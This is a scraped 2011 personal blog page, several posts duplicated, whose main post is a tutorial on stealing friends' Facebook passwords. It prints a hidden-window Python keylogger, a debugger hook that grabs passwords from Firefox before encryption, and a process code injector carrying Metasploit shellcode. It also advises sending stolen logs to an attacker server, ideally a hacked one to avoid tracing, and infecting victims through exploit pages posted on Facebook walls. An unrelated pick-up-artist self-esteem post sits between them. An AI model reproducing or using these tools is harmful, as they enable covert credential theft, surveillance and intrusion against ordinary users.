fredag 14 oktober 2011
söndag 11 september 2011
Geek Update - Hacking Facebook.
This article is adressed to people that are developers.
Face it, if you don't write your own hacker tools you are not an hacker.
Not in my world. You are an scriptkiddie that uses other peoples tools.
It's nothing wrong with that you need to start somewhere, propably my early
years in the world of hacking, and I was as a scriptkiddie i hacked more computers on a day that I do today do on a year. This because as a scriptkiddie you have alot of freetime, you will also find a method that works, and then you search for the net after vurnerable servers that you can apply that method on. Today I don't even hack that much because I'm more intressted in the knowledge then to break in somewhere.
The power to be an real hacker is that you can write your own tools that adress just the computer you want to hack. Today I gona discuss my truth what I believe is the easiest ways to hack socialnetworks. This because many starters seams intressted in this atleast what I can read on many computer forums. Guess they feel more power if they can hack there friends and enemies accounts on a socialnetwork then a server that they have no connection to.
Hack Facebook method: 1 )
Is harder to attack the whole facebook site. So thats why you attack the victim directly that has less security and probably easy to fool with socialenginering if this is required. So this is methods apply on attack your victim directly.
As a scriptkiddie propably the easiet way is to trick him to be infected with an RAT tool ( Remote Administration Tool ). Problem with this is that many users have antivirus programs that will detect this, this also require some socialenginering to get this to work. Thats why we need to write this tool ourself.
Best way to think as a sucessfull hacker my opinion is the KISS ( Keep IT Simple Stupid ) mindset. So think first what is our goal, what do we want to accomplish.
Then we write tools that adress this.
This case our goal is to have the user password so we can login on his account.
To acomplish this we write an RAT ourself but because we use the KISS mindset and are sure what our goal is. We just write an RAT that saves his password and send it to us when he login on facebook, all other functionallity is unintressted. Less functions less detected by an antivirus program, and It's easy to write a program that do one thing and does it well. An experienced user will know that actaully this is not an RAT at all anymore it's an keylogger, and yes it is!
Ok, lets start build this keylogger. I would choose python as language. Thats because its really easy to write hacker tools in python and it's a scripting language so you don't need to compile also easier to work with when you are testing, and it's possible to create an executeble file later when needed. You will also need an server where your program will send the passwords to you when the user have logged in. Best ofcourse if the server is hacked so there is no connection if someone investigate where the passwords are sent, but because this attacks no company servers you are probably more save except your victims will hate you if they find out.
I will not share whole my code here because I don't want any scriptkiddies to use it.
Just want to share this method to the ones that want to know, and they can write there tools themself. I will share some example codes that show how this could be accomplish just as examples. This a simple keylogger as example
#----------------------------------------
# Simple Keylogger 1.0 Wrote by nighter
# Purpose: I needed a simple and easy
# Keylogger this was the solution.
# Revision: 1.0
#----------------------------------------
# load all modules
import pythoncom,pyHook,datetime,win32api,win32console,win32gui,os,sys
win = win32console.GetConsoleWindow()
# Make window invicible
win32gui.ShowWindow(win,0)
#--------------------------------------------
# Config Section
#-------------------------------------------
LOGGFILE="c:\\keylogg.txt"
#-------------------------------------------
# Function: OnKeyboardEvent
# Arguments: event
# Purpose: catch keyboardevents
#------------------------------------------
def OnKeyboardEvent(event):
mylog_file = open(LOGGFILE,"a")
# Problem with return and space so i handle
# Them seperatly.
if event.Key == "Return":
mylog_file.write(chr(10))
elif event.Key == "Space":
mylog_file.write(chr(32))
else:
# Convert and write all other chars.
mylog_file.write(chr(event.Ascii))
mylog_file.close()
return True
#------------------------------------------
# Check that only one instance is running
#------------------------------------------
needle=0
f = os.popen("tasklist","r")
for l in f.xreadlines():
if "python.exe" in l: needle=needle+1
# Quit if another instance is running
if needle > 1:
win32api.PostQuitMessage()
# Write timestamp
mylog_file = open(LOGGFILE,"a")
n = datetime.datetime.now()
mylog_file.write(str(n))
mylog_file.write(chr(10))
mylog_file.write("--------------------------")
mylog_file.write(chr(10))
mylog_file.close()
# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
Very simple but it's just to give you an clue how to do this. Then you need
to add some clever socket code that send the keylogger file to your server sometimes so you could review it. Problem with this is that it will log alot amount of data that are not intressted and more detecteble when it sends the file to you because of this. If the goal is just to access facebook, is better if it logs just the facebook password and sent it to you, to accomplish this is better to software hook functions in the victims webbrowser. You can do that like this.
( Example on firefox )
from pydbg import *
from pydbg.defines import *
import struct
import utils
import sys
dbg = pydbg()
found_firefox = False
# Let's set a global pattern that we can make the hook
# search for
pattern = "password"
# We take in the dbg instance, which also contains all
# of our register contexts, and a list[] of arguments that
# we hooked, the one we are interested in is args[1]
def ssl_sniff( dbg, args ):
# Now we read out the memory pointed to by the second argument
# it is stored as an ASCII string, so we'll loop on a read until
# we reach a NULL byte
buffer = ""
offset = 0
while 1:
byte = dbg.read_process_memory( args[1] + offset, 1 )
if byte != "\x00":
buffer += byte
offset += 1
continue
else:
break
if pattern in buffer:
print "Pre-Encrypted: %s" % buffer
return DBG_CONTINUE
# Quick and dirty process enumeration to find firefox.exe
for (pid, name) in dbg.enumerate_processes():
if name.lower() == "firefox.exe":
found_firefox = True
hooks = utils.hook_container()
dbg.attach(pid)
print "[*] Attaching to firefox.exe with PID: %d" % pid
# Resolve the function address
hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")
if hook_address:
# Add the hook to the container, we aren't interested
# in using an exit callback so we set it to None
hooks.add( dbg, hook_address, 2, ssl_sniff, None)
print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
break
else:
print "[*] Error: Couldn't resolve hook address."
sys.exit(-1)
if found_firefox:
print "[*] Hooks set, continuing process."
dbg.run()
else:
print "[*] Error: Couldn't find the firefox.exe process. Please fire up firefox first."
sys.exit(-1)
Ok, so you have now write your tools, next problem is to get this tool installed on the victims computer. To do this I like to use exploits to infect the victim with my tools. I love the "metasploit project" is an tool thats up to date with the latest security holes. You don't need to keep track because they do it for you with alot of allredy written exploit modules. So i often check this and rewritte there modules to be able to infect an computer with your tools. Easiest if setup and webbserver with aproporate exploit modules rewritten from metasploit that infect the victim when they visit your homepage.
So now you can paste your homepage address on the facebook wall, and watch slowly how your friends password starting to get sent to your server.
This is maybe not etical correctly if you do this because your propably have no friends left if you are hacking there privatelife, but this a simple demostration how to hack FB. What you do with this information is up to you.
Face it, if you don't write your own hacker tools you are not an hacker.
Not in my world. You are an scriptkiddie that uses other peoples tools.
It's nothing wrong with that you need to start somewhere, propably my early
years in the world of hacking, and I was as a scriptkiddie i hacked more computers on a day that I do today do on a year. This because as a scriptkiddie you have alot of freetime, you will also find a method that works, and then you search for the net after vurnerable servers that you can apply that method on. Today I don't even hack that much because I'm more intressted in the knowledge then to break in somewhere.
The power to be an real hacker is that you can write your own tools that adress just the computer you want to hack. Today I gona discuss my truth what I believe is the easiest ways to hack socialnetworks. This because many starters seams intressted in this atleast what I can read on many computer forums. Guess they feel more power if they can hack there friends and enemies accounts on a socialnetwork then a server that they have no connection to.
Hack Facebook method: 1 )
Is harder to attack the whole facebook site. So thats why you attack the victim directly that has less security and probably easy to fool with socialenginering if this is required. So this is methods apply on attack your victim directly.
As a scriptkiddie propably the easiet way is to trick him to be infected with an RAT tool ( Remote Administration Tool ). Problem with this is that many users have antivirus programs that will detect this, this also require some socialenginering to get this to work. Thats why we need to write this tool ourself.
Best way to think as a sucessfull hacker my opinion is the KISS ( Keep IT Simple Stupid ) mindset. So think first what is our goal, what do we want to accomplish.
Then we write tools that adress this.
This case our goal is to have the user password so we can login on his account.
To acomplish this we write an RAT ourself but because we use the KISS mindset and are sure what our goal is. We just write an RAT that saves his password and send it to us when he login on facebook, all other functionallity is unintressted. Less functions less detected by an antivirus program, and It's easy to write a program that do one thing and does it well. An experienced user will know that actaully this is not an RAT at all anymore it's an keylogger, and yes it is!
Ok, lets start build this keylogger. I would choose python as language. Thats because its really easy to write hacker tools in python and it's a scripting language so you don't need to compile also easier to work with when you are testing, and it's possible to create an executeble file later when needed. You will also need an server where your program will send the passwords to you when the user have logged in. Best ofcourse if the server is hacked so there is no connection if someone investigate where the passwords are sent, but because this attacks no company servers you are probably more save except your victims will hate you if they find out.
I will not share whole my code here because I don't want any scriptkiddies to use it.
Just want to share this method to the ones that want to know, and they can write there tools themself. I will share some example codes that show how this could be accomplish just as examples. This a simple keylogger as example
#----------------------------------------
# Simple Keylogger 1.0 Wrote by nighter
# Purpose: I needed a simple and easy
# Keylogger this was the solution.
# Revision: 1.0
#----------------------------------------
# load all modules
import pythoncom,pyHook,datetime,win32api,win32console,win32gui,os,sys
win = win32console.GetConsoleWindow()
# Make window invicible
win32gui.ShowWindow(win,0)
#--------------------------------------------
# Config Section
#-------------------------------------------
LOGGFILE="c:\\keylogg.txt"
#-------------------------------------------
# Function: OnKeyboardEvent
# Arguments: event
# Purpose: catch keyboardevents
#------------------------------------------
def OnKeyboardEvent(event):
mylog_file = open(LOGGFILE,"a")
# Problem with return and space so i handle
# Them seperatly.
if event.Key == "Return":
mylog_file.write(chr(10))
elif event.Key == "Space":
mylog_file.write(chr(32))
else:
# Convert and write all other chars.
mylog_file.write(chr(event.Ascii))
mylog_file.close()
return True
#------------------------------------------
# Check that only one instance is running
#------------------------------------------
needle=0
f = os.popen("tasklist","r")
for l in f.xreadlines():
if "python.exe" in l: needle=needle+1
# Quit if another instance is running
if needle > 1:
win32api.PostQuitMessage()
# Write timestamp
mylog_file = open(LOGGFILE,"a")
n = datetime.datetime.now()
mylog_file.write(str(n))
mylog_file.write(chr(10))
mylog_file.write("--------------------------")
mylog_file.write(chr(10))
mylog_file.close()
# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
Very simple but it's just to give you an clue how to do this. Then you need
to add some clever socket code that send the keylogger file to your server sometimes so you could review it. Problem with this is that it will log alot amount of data that are not intressted and more detecteble when it sends the file to you because of this. If the goal is just to access facebook, is better if it logs just the facebook password and sent it to you, to accomplish this is better to software hook functions in the victims webbrowser. You can do that like this.
( Example on firefox )
from pydbg import *
from pydbg.defines import *
import struct
import utils
import sys
dbg = pydbg()
found_firefox = False
# Let's set a global pattern that we can make the hook
# search for
pattern = "password"
# We take in the dbg instance, which also contains all
# of our register contexts, and a list[] of arguments that
# we hooked, the one we are interested in is args[1]
def ssl_sniff( dbg, args ):
# Now we read out the memory pointed to by the second argument
# it is stored as an ASCII string, so we'll loop on a read until
# we reach a NULL byte
buffer = ""
offset = 0
while 1:
byte = dbg.read_process_memory( args[1] + offset, 1 )
if byte != "\x00":
buffer += byte
offset += 1
continue
else:
break
if pattern in buffer:
print "Pre-Encrypted: %s" % buffer
return DBG_CONTINUE
# Quick and dirty process enumeration to find firefox.exe
for (pid, name) in dbg.enumerate_processes():
if name.lower() == "firefox.exe":
found_firefox = True
hooks = utils.hook_container()
dbg.attach(pid)
print "[*] Attaching to firefox.exe with PID: %d" % pid
# Resolve the function address
hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")
if hook_address:
# Add the hook to the container, we aren't interested
# in using an exit callback so we set it to None
hooks.add( dbg, hook_address, 2, ssl_sniff, None)
print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
break
else:
print "[*] Error: Couldn't resolve hook address."
sys.exit(-1)
if found_firefox:
print "[*] Hooks set, continuing process."
dbg.run()
else:
print "[*] Error: Couldn't find the firefox.exe process. Please fire up firefox first."
sys.exit(-1)
Ok, so you have now write your tools, next problem is to get this tool installed on the victims computer. To do this I like to use exploits to infect the victim with my tools. I love the "metasploit project" is an tool thats up to date with the latest security holes. You don't need to keep track because they do it for you with alot of allredy written exploit modules. So i often check this and rewritte there modules to be able to infect an computer with your tools. Easiest if setup and webbserver with aproporate exploit modules rewritten from metasploit that infect the victim when they visit your homepage.
So now you can paste your homepage address on the facebook wall, and watch slowly how your friends password starting to get sent to your server.
This is maybe not etical correctly if you do this because your propably have no friends left if you are hacking there privatelife, but this a simple demostration how to hack FB. What you do with this information is up to you.
söndag 28 augusti 2011
Social Dynamic - Treating Yourself Like You Value Yourself
Hey Fellas,
Today I want to delve into the importance and benefits of a healthy lifestyle. I know, I know… no one likes to be told “go to the gym” but today I actually want to approach it from a psychological angle and explore the immediate psychological benefits and social impact a healthy lifestyle yields.
The relative principal here is Cognitive Dissonance – (thank you to the kind folks at Wikipedia for the following definition)
Cognitive dissonance is an uncomfortable feeling caused by holding two contradictory ideas simultaneously. The "ideas" or "cognitions" in question may include attitudes and beliefs, and also the awareness of one's behavior. The theory of cognitive dissonance proposes that people have a motivational drive to reduce dissonance by changing their attitudes, beliefs, and behaviors, or by justifying or rationalizing their attitudes, beliefs, and behaviors.
Or to put simply: anytime your actions are not in line with your beliefs your brain is not happy.
Well, this simple semi-obvious holds a special relevance us that does not apply to most people. See, essentially when learning this game our challenge is to re-wire our brains as much as possible over as short a time-span as possible so as to align our thought patterns with those that are naturally attractive. In essence, to form new beliefs and identifications that are not necessarily justified by prior teachings, or more importantly, reference experience.
A common trait among those who excel in this game is a high degree of cognitive mastery – an ability to actively shape their thoughts and beliefs based on what will serve them, as opposed to what meshes with their existing understanding and experience. Or essentially an ability to convince themselves of what they believe will be useful.
Now when it comes to success in dating, what are some essential core beliefs? What are the catch phrases people are affirming and reaffirming to themselves?
“I’m the shit!”
“I’m the man”
“I deserve this”
“She’s for me”
“She should be with me?”
“I’m the highest value person in this room”
Ok, most likely you’re not actively repeating these to yourself… but there’s no doubt these beliefs are inherent to a high-value mindset held by a naturally attractive guy and ALL are representative of a single core belief – a level of self-value.
Here’s where cognitive dissonance comes in… I hate to break it to you, but if you’re sitting in your basement from Monday to Thursday playing World of Warcraft and eating Cheetos it’s going to be impossible to step to a hottie on Friday and feel “I deserve this”…
Fact is… it’s impossible to successfully and consistently pick up girls without first feeling good about yourself. And guess what… cognitive dissonance means that it’s impossible to feel good about yourself without behaving like you feel good about yourself… like you like yourself…like you value yourself.
What does it mean to behave in a way that indicates you like yourself… that you value yourself?
Suppose you value your car… You’re probably washing it regularly, putting premium gas in it, taking it for checkups, rotating the tires, etc.
Well, you’re no different. When you value yourself - or at the very lease you don’t hate yourself - you’re going to make an effort to care for yourself… this means being at least minimally conservative with what you put in your body – eating at least decently healthy, taking in fruits and vegetables, cutting down on junk food. Beyond that comes maintaining a minimal level of physical activity. Personal hygiene and present-ability also fall into this category.
Beyond that, what you do for YOU is determined by just how much you value YOU. Here we move beyond simply caring for and maintaining yourself and into the realm of actively improving oneself. Things like adhering to a schedule, going to the gym, eating healthy breakfasts, pursuing activities that develop you physically, mentally, or spiritually. Taking classes, travelling, enriching your life.
I’ll tell you, I honestly do not know a single person who holds themselves in high regard who does not engage in the above activities.
Now, as you read this, sit up straight, roll your shoulders back, and SMILE. How do you feel… a little happier?? The effect here is ‘psychosomatic’ – or a backwards rationalization from the mind based on the body. The mind says “Hey look at that, I’m sitting up and smiling…. Usually I do this when I’m happy, well I’m doing it now so I must be happy”.
Well, in this case, you spend your day productively – you eat a healthy breakfast, hit the gym, learn something, accomplish something, and all the sudden you’re brain is bombarded with evidence that you’re WORTH something. Then you go out, start that interaction and suddenly you feel a new strength in your own identity… you carry yourself with a sense of value, with a sense of self-worth.
On a personal level, if I roll out of bed at 2pm, throw on some dirty sweats (possibly stained from the meatball sub I ate 3 nights before), and head out to get some grease breakfast from the 24hour diner… there is absolutely no way I can “turn on the game” and socialize effectively. It’s got nothing to do with the way I look… it’s got everything to do with the way I feel.
And on the flipside, when I’m living in alignment – with the way I treat myself reaffirming the way I feel about myself, the world can tell and responds accordingly.
Ultimately, the way I feel is derived from that over-arching sense of self-worth that’s either their or not there depending on the physical evidence I spend all day every day acquiring.
Are you worth it? Are you behaving like it?
If you think you’re brain is going to let these two exist in misalignment, you’re in for a rude awakening. So choose your answer and solidify it… both internally and externally.
Cheers
Today I want to delve into the importance and benefits of a healthy lifestyle. I know, I know… no one likes to be told “go to the gym” but today I actually want to approach it from a psychological angle and explore the immediate psychological benefits and social impact a healthy lifestyle yields.
The relative principal here is Cognitive Dissonance – (thank you to the kind folks at Wikipedia for the following definition)
Cognitive dissonance is an uncomfortable feeling caused by holding two contradictory ideas simultaneously. The "ideas" or "cognitions" in question may include attitudes and beliefs, and also the awareness of one's behavior. The theory of cognitive dissonance proposes that people have a motivational drive to reduce dissonance by changing their attitudes, beliefs, and behaviors, or by justifying or rationalizing their attitudes, beliefs, and behaviors.
Or to put simply: anytime your actions are not in line with your beliefs your brain is not happy.
Well, this simple semi-obvious holds a special relevance us that does not apply to most people. See, essentially when learning this game our challenge is to re-wire our brains as much as possible over as short a time-span as possible so as to align our thought patterns with those that are naturally attractive. In essence, to form new beliefs and identifications that are not necessarily justified by prior teachings, or more importantly, reference experience.
A common trait among those who excel in this game is a high degree of cognitive mastery – an ability to actively shape their thoughts and beliefs based on what will serve them, as opposed to what meshes with their existing understanding and experience. Or essentially an ability to convince themselves of what they believe will be useful.
Now when it comes to success in dating, what are some essential core beliefs? What are the catch phrases people are affirming and reaffirming to themselves?
“I’m the shit!”
“I’m the man”
“I deserve this”
“She’s for me”
“She should be with me?”
“I’m the highest value person in this room”
Ok, most likely you’re not actively repeating these to yourself… but there’s no doubt these beliefs are inherent to a high-value mindset held by a naturally attractive guy and ALL are representative of a single core belief – a level of self-value.
Here’s where cognitive dissonance comes in… I hate to break it to you, but if you’re sitting in your basement from Monday to Thursday playing World of Warcraft and eating Cheetos it’s going to be impossible to step to a hottie on Friday and feel “I deserve this”…
Fact is… it’s impossible to successfully and consistently pick up girls without first feeling good about yourself. And guess what… cognitive dissonance means that it’s impossible to feel good about yourself without behaving like you feel good about yourself… like you like yourself…like you value yourself.
What does it mean to behave in a way that indicates you like yourself… that you value yourself?
Suppose you value your car… You’re probably washing it regularly, putting premium gas in it, taking it for checkups, rotating the tires, etc.
Well, you’re no different. When you value yourself - or at the very lease you don’t hate yourself - you’re going to make an effort to care for yourself… this means being at least minimally conservative with what you put in your body – eating at least decently healthy, taking in fruits and vegetables, cutting down on junk food. Beyond that comes maintaining a minimal level of physical activity. Personal hygiene and present-ability also fall into this category.
Beyond that, what you do for YOU is determined by just how much you value YOU. Here we move beyond simply caring for and maintaining yourself and into the realm of actively improving oneself. Things like adhering to a schedule, going to the gym, eating healthy breakfasts, pursuing activities that develop you physically, mentally, or spiritually. Taking classes, travelling, enriching your life.
I’ll tell you, I honestly do not know a single person who holds themselves in high regard who does not engage in the above activities.
Now, as you read this, sit up straight, roll your shoulders back, and SMILE. How do you feel… a little happier?? The effect here is ‘psychosomatic’ – or a backwards rationalization from the mind based on the body. The mind says “Hey look at that, I’m sitting up and smiling…. Usually I do this when I’m happy, well I’m doing it now so I must be happy”.
Well, in this case, you spend your day productively – you eat a healthy breakfast, hit the gym, learn something, accomplish something, and all the sudden you’re brain is bombarded with evidence that you’re WORTH something. Then you go out, start that interaction and suddenly you feel a new strength in your own identity… you carry yourself with a sense of value, with a sense of self-worth.
On a personal level, if I roll out of bed at 2pm, throw on some dirty sweats (possibly stained from the meatball sub I ate 3 nights before), and head out to get some grease breakfast from the 24hour diner… there is absolutely no way I can “turn on the game” and socialize effectively. It’s got nothing to do with the way I look… it’s got everything to do with the way I feel.
And on the flipside, when I’m living in alignment – with the way I treat myself reaffirming the way I feel about myself, the world can tell and responds accordingly.
Ultimately, the way I feel is derived from that over-arching sense of self-worth that’s either their or not there depending on the physical evidence I spend all day every day acquiring.
Are you worth it? Are you behaving like it?
If you think you’re brain is going to let these two exist in misalignment, you’re in for a rude awakening. So choose your answer and solidify it… both internally and externally.
Cheers
Geek update - Python keylogger
My simple keylogger example written in python.
Use this to log keystrokes.
Use this to log keystrokes.
#----------------------------------------
# Simple Keylogger 1.0 Wrote by nighter
# Purpose: I needed a simple and easy
# Keylogger this was the solution.
# Revision: 1.0
#----------------------------------------
# load all modules
import pythoncom,pyHook,datetime,win32api,win32console,win32gui,os,sys
win = win32console.GetConsoleWindow()
# Make window invicible
win32gui.ShowWindow(win,0)
#--------------------------------------------
# Config Section
#-------------------------------------------
LOGGFILE="c:\\keylogg.txt"
#-------------------------------------------
# Function: OnKeyboardEvent
# Arguments: event
# Purpose: catch keyboardevents
#------------------------------------------
def OnKeyboardEvent(event):
mylog_file = open(LOGGFILE,"a")
# Problem with return and space so i handle
# Them seperatly.
if event.Key == "Return":
mylog_file.write(chr(10))
elif event.Key == "Space":
mylog_file.write(chr(32))
else:
# Convert and write all other chars.
mylog_file.write(chr(event.Ascii))
mylog_file.close()
return True
#------------------------------------------
# Check that only one instance is running
#------------------------------------------
needle=0
f = os.popen("tasklist","r")
for l in f.xreadlines():
if "python.exe" in l: needle=needle+1
# Quit if another instance is running
if needle > 1:
win32api.PostQuitMessage()
# Write timestamp
mylog_file = open(LOGGFILE,"a")
n = datetime.datetime.now()
mylog_file.write(str(n))
mylog_file.write(chr(10))
mylog_file.write("--------------------------")
mylog_file.write(chr(10))
mylog_file.close()
# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
lördag 27 augusti 2011
Geek update - Python code injector
Here is sourcecode to my code injector written in python.
It's an example how you can execute code in an already running process.
It's an example how you can execute code in an already running process.
import sys
from ctypes import *
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = ( 0x000F0000 0x00100000 0xFFF )
VIRTUAL_MEM = ( 0x1000 0x2000 )
kernel32 = windll.kernel32
pid = int(sys.argv[1])
pid_to_kill = sys.argv[2]
if not sys.argv[1] or not sys.argv[2]:
print "Code Injector: ./code_injector.py"
sys.exit(0)
#/* win32_exec - EXITFUNC=thread CMD=cmd.exe /c taskkill /PID AAAA
#Size=159 Encoder=None http://metasploit.com */
shellcode = \
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" \
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" \
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" \
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" \
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" \
"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" \
"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" \
"\x83\xc0\x7b\x50\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff" \
"\xe7\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b" \
"\x6b\x69\x6c\x6c\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00"
padding = 4 - (len( pid_to_kill ))
replace_value = pid_to_kill + ( "\x00" * padding )
replace_string= "\x41" * 4
shellcode = shellcode.replace( replace_string, replace_value )
code_size = len(shellcode)
# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )
if not h_process:
print "[*] Couldn't acquire a handle to PID: %s" % pid
sys.exit(0)
# Allocate some space for the shellcode
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
# Write out the shellcode
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))
# Now we create the remote thread and point it's entry routine
# to be head of our shellcode
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):
print "[*] Failed to inject process-killing shellcode. Exiting."
sys.exit(0)
print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
print "[*] Process %s should not be running anymore!" % pid_to_kill
Prenumerera på:
Inlägg (Atom)